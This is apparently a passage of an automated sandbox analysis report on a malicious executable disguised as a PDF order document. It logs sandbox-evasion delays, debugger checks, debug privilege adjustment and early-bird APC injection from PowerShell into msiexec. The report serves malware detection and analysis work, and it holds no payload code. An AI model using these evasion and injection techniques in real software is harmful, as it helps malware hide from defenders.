Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598786	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6706			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3085			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184	Thread sleep count: 1764 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184	Thread sleep count: 8064 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598786s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596717s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596327s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -596030s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep time: -593735s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598786	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd0b53820095de<
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

API call chain: ExitProcess graph end node

graph_0-3391

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4220000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
